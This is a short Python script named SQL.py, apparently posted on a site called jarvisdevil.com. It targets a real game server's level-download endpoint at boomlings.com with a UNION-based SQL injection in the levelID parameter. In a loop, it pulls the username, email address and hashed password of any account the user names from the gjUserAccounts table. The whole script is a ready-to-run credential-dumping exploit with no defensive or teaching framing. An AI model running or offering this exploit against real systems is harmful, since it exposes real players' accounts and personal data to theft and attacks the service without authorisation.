jarvisdevil.com

SQL.py
from urllib.request import urlopen
url = "http://www.boomlings.com/database/downloadGJLevel21.php"
while 1==1:
    username = input("Please enter the username in decimal format: ")
    username = username.replace(" ",",")
    levelID = "130 union select 1,2,3,username,5,password2,7,8,9,email,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from gjUserAccounts where username = CHAR("+str(username)+") --"
    p = "gameVersion=20&binaryVersion=29&levelID="+str(levelID)+"&inc=1&extras=0&secret=Wmfd2893gb7"
    p = p.encode()
    data = urlopen(url,p).read().decode()
    data = data.split(":")
    print("Username: "+str(data[11])+", Email: "+str(data[35])+" Hashed Password: "+str(data[15]))